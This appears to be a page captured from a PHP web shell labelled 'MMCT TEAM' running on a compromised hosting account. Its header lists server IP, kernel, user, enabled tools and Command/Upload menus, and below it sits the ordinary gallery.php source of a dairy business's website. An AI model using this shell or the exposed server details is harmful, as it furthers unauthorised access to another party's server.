MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 3.140.196.5
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/milkodelight.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/milkodelight.com/gallery.php
<?php
    include_once('admin/config.php');
?>
<!doctype html>
<html class="no-js" lang="zxx">

<head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <title>Gallery | Milko Delight</title>
    <meta name="description" content="Gallery | Milko Delight">
    
    <?php include "top-links.php";?>
</head>
<body>
   
    <?php include "header.php";?>
   
   <div class="bd-breadcrumb__area include__bg hero__overlay Breadcrumb__height d-flex align-items-center" data-background="<?php echo $wspath?>assets/img/hero/breadcrumb.jpg">
      <div class="container fluid">
         <div class="row">
            <div class="col-xl-12">
               <div class="bd-breadcrumb__menu">
                  <nav aria-label="Breadcrumbs" class="breadcrumb-trail breadcrumbs">
                     <ul class="trail-items">
                        <li class="trail-item trail-begin"><span><a href="<?php echo $wspath?>">Home</a></span></li>
                        <li class="trail-item trail-end"><span>Gallery</span></li>
                     </ul>
                  </nav>
               </div>
               <div class="bd-breadcrumb__title">
                  <h2>Our Gallery</h2>
               </div>
            </div>
         </div>
      </div>
   </div>
   
   <!-- Gallery info area start  -->
   <div class="bd-trem__gallery pt-60 pb-90">
      <div class="container">
            <div class="bd-section__title-wrapper mb-50">
                <span class="bd-sub__title">Gallery</span>
                <h2 class="bd-section__title">Our Gallery</h2>
            </div>
         <div class="row grid gallery-grid-items">
            <?php 
                $sql = "SELECT * FROM `tbl_gallery`";
                $run = mysqli_query($db,$sql) or die("Query Not run");
                while($data = mysqli_fetch_assoc($run)){
            ?>
            <div class="col-xl-3 col-lg-3 col-md-6 grid-item c-2 c-3">
               <div class="bd-singel__gallery-item mb-30">
                  <div class="bd-gallery__thumb">
                     <a href="#">
                        <img src="<?php echo $wspath?>admin/images/gallery/<?php echo $data['image']?>" alt="Gallery">
                     </a>
                  </div>
                  <span class="bd-gallery__action">
                     <a class="popup-image" href="<?php echo $wspath?>admin/images/gallery/<?php echo $data['image']?>"><i class="fa-regular fa-face-cowboy-hat"></i></a>
                  </span>
               </div>
            </div>
            <?php } ?>
         </div>
      </div>
    </div>
    
    <?php include "footer.php";?>

</body>

</html>

MMCT - 2023